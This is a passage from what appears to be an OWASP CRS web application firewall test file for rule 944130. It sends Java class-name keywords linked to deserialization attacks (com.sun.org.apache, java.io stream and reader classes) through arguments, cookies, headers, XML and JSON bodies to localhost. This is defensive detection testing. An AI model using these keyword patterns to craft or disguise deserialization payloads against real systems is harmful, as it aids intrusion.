"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML attribute value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-35 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Argument name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-57 + desc: "Argument name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-58 + desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-59 + desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-60 + desc: "Request header test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-61 + desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-62 + desc: "XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-63 + desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-64 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-65 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-66 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-67 + desc: "Argument test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-68 + desc: "Argument name 